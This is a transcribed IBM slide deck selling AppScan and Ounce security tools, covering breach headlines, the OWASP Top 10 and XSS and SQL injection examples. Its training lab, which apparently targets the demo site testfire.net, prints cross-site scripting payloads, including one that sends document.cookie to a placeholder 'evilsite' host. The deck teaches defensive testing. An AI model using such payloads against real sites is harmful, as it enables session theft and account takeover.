Rational AppScan & Ounce Products

Transcription

1 IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation

2 IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack January 9, 2009 Hannaford Bros. Grocery Chain 4 million credit & debit cards exposed March 18, 2008 Montgomery Ward 51,000 customer credit card numbers... June 27, 2008 Target Stores Blind users win $6M suite; Target to make website accessible

3 IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack January 9, 2009 Hannaford Bros. Grocery Chain 4 million credit & debit cards exposed March 18, 2008 Montgomery Ward 51,000 customer credit card numbers... June 27, 2008 Target Stores Blind users win $6M suite; Target to make website accessible

4 IBM Software Group Bad Press Decreases Shareholder Value One-day market cap drop of $200M 3

5 IBM Software Group Rational software The Reality: Security and Focus Are Unbalanced Security Security Spending 75% 10% % of Attacks Web Applications % of Dollars 90% 25% Network Server of All Attacks on Information Security 75% Are Directed to the Web Application Layer 2/3 of All Web Applications Are Vulnerable 2

6 IBM Software Group The Myth: Our Site Is Safe Security 5

7 IBM Software Group The Myth: Our Site Is Safe Security We Have Firewalls in Place We Audit It Once a Quarter with Pen Testers We Use Network Vulnerability Scanners 5

8 IBM Software Group Rational software High Level Web Application Architecture Review Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Middle Tier Logic) Data Tier 3

9 IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Middle Tier Logic) Data Tier 3

10 IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Middle Tier Logic) Data Tier 3

11 IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) (Presentation) App Server (Business Database Protects Network Middle Tier Logic) Data Tier 3

12 IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) SSL (Presentation) App Server (Business Database Protects Transport Protects Network Middle Tier Logic) Data Tier 3

13 IBM Software Group Rational software High Level Web Application Architecture Review Customer App is deployed here Sensitive data is stored here Internet Client Tier Firewall (Browser) SSL (Presentation) App Server (Business Database Protects Transport Protects Network Middle Tier Logic) Data Tier 3

14 IBM Software Group Rational software Network Defenses for Web Applications Security Perimeter IDS IPS App Firewall Firewall Intrusion Intrusion Application HTTP Detection System Prevention System Firewall designed to (fail securely) by allowing through traffic that they don't understand Request System Incident Event Management (SIEM) 4

15 IBM Software Group Rational software Security Testing Technologies Primer Static Code Analysis = Whitebox - Looking at the code for security issues (code-level scanning) Total Potential Security Issues Dynamic Analysis = Blackbox - Sending tests to a functioning application Static Analysis Dynamic Analysis 6

16 IBM Software Group Building Security & Compliance into the Software SDLC Coding Build QA Security Production Developers Enable Security to effectively drive remediation into development Developers Developers Provides Developers and Testers with expertise on detection and remediation ability Ensure vulnerabilities are addressed before applications are put into production 9

17 IBM Software Group Rational software Rational AppScan End-to-End Web Application Security REQUIREMENTS CODE BUILD QA SECURITY PRODUCTION Req ts Definition (security templates) Ounce Products - Eclipse/VS IDE AppScan Tester (scan agent & clients) AppScan Enterprise / Reporting Console (enterprise-wide scanning and reporting) AppScan Standard (desktop) AppScan OnDemand (SaaS) Security requirements defined before design & implementation Build security testing into the IDE* Automate Security / Compliance testing in the Build Process Security / compliance testing incorporated into testing & remediation workflows Security & Compliance Testing, oversight, control, policy, audits Outsourced testing for security audits & production site monitoring Application Security Best Practices Address security from the start Security audit solutions for IT Security Security for the development lifecycle 5

18 IBM Software Group Open Web Application Security Project (OWASP) Top10 Application Threat Negative Impact Example Impact Cross-Site scripting Injection Flaws Malicious File Execution Insecure Direct Object Reference Cross-Site Request Forgery Information Leakage and Improper Error Handling Broken Authentication & Session Management Insecure Cryptographic Storage Insecure Communications Identity Theft, Sensitive Information Leakage, Attacker can manipulate queries to the DB / LDAP / Other system Execute shell commands on server, up to full control Attacker can access sensitive files and resources Attacker can invoke blind actions on Web applications, impersonating as a trusted user Attackers can gain detailed system information Session tokens not guarded or invalidated properly Weak encryption techniques may lead to broken encryption Sensitive info sent unencrypted over insecure channel Hackers can impersonate legitimate users, and control their accounts. Hackers can access backend database information, alter it or steal it. Site modified to transfer all interactions to the hacker. Web application returns contents of sensitive file (instead of harmless one) Blind requests to bank account transfer money to hacker Malicious system reconnaissance may assist in developing further attacks Hacker can force session token on victim; session tokens can be stolen after logout Confidential information (SSN, Credit Cards) can be decrypted by malicious users Unencrypted credentials sniffed and used by hacker to impersonate user Failure to Restrict URL Access Hacker can access unauthorized Hacker can forcefully browse and access a page resources past the login page 11

19 IBM Software Group Cross-Site Scripting The Exploit Process Evil.org User bank.com 12

20 IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via or HTTP User bank.com 12

21 IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via or HTTP User 2) User sends script embedded as data bank.com 12

22 IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via or HTTP User 2) User sends script embedded as data 3) Script/data returned, executed by browser bank.com 12

23 IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via or HTTP User 4) Script sends user s cookie and session information without the user s consent or knowledge 2) User sends script embedded as data bank.com 3) Script/data returned, executed by browser 12

24 IBM Software Group Cross-Site Scripting The Exploit Process Evil.org 1) Link to bank.com sent to user via or HTTP User 4) Script sends user s cookie and session information without the user s consent or knowledge 5) Evil.org uses stolen session information to impersonate user 2) User sends script embedded as data 3) Script/data returned, executed by browser bank.com 12

25 Lab 1 IBM Software Group Profile Web Application, Steal Cookies The Goal of this lab is to: profile the demo.testfire.net application utilize a Cross-Site Scripting vulnerability on the demo.testfire.net application in order to access cookies on a target user s browser Search Super Bowl <B>Super Bowl</B> <script>alert(1)</script> <script>alert(document.cookie)</script> Tamperdata - for gathering the Cookie information to send to Grandma! SEARCH - <script>document.write('<img src= evilsite/'+document.cookie);</script> 13

26 IBM Software Group SQL Injection Example 14

27 IBM Software Group SQL Injection Example 15

28 IBM Software Group SQL Injection Example - Exploit 16

29 IBM Software Group SQL Injection Example - Outcome 17

30 IBM Software Group Information Leakage Different User/Pass Error verbose login error messages 18

31 IBM Software Group Failure to Restrict URL Access - Admin User login Privilege Escalation Example 19

32 IBM Software Group Failure to Restrict URL Access - Admin User login Privilege Escalation Example /admin/admin.aspx 19

33 IBM Software Group Forcefully browse to admin page 20

34 IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 21 IBM Confidential

35 IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 21 IBM Confidential

36 IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 2. Analyze all content for malicious behavior indicators 3. Compare all links to comprehensive black-lists 21 IBM Confidential

37 IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 2. Analyze all content for malicious behavior indicators 3. Compare all links to comprehensive black-lists link1 link2 link3 21 IBM Confidential

38 IBM Software Group Rational AppScan s HTTP-Based Malware Scanning 1. Discover all content and links in a Web Application Execute JavaScript & Flash Fill forms and login sequences Analyze secure pages 2. Analyze all content for malicious behavior indicators 3. Compare all links to comprehensive black-lists link1 link2 link3 21 IBM Confidential

39 IBM Software Group Introducing expanded Rational AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large) AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans The Result: Ability to address online risk without in-house resources with the faster route to actionable information 22

40 IBM Software Group Introducing expanded Rational AppScan/Policy Tester OnDemand AppScan OnDemand: Comprehensive testing of pre-production applications Periodic assessment of applications in QA or Security Monthly scans Flexible offerings (Small/Medium/Large) AppScan Tester OnDemand Production Site Monitoring: Continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live Dynamic or interactive content and forms, online registrations Weekly scans The Result: Ability to address online risk without in-house resources with the faster route to actionable information 22

41 IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation 2008 IBM Corporation

42 IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation 2008 IBM Corporation

43 IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation Flex Next-Generation of Flash 2008 IBM Corporation

44 IBM Software Group Watchfire Solutions IBM Software Group Rational software The Impact of Securing Flash-based Applications Flash one of the fastest growing security problems Practically in every web application Flash vulnerabilities: Cross-Site Flashing Cross-Site Scripting through Flash Phishing Flow Manipulation Flex Next-Generation of Flash Marketing Flash Banner Compromises the entire web application 2008 IBM Corporation

45 IBM Software Group Rational software 7

46 IBM Software Group Rational software 8

47 IBM Software Group Rational software 9

48 IBM Software Group Rational software 9

49 IBM Software Group 28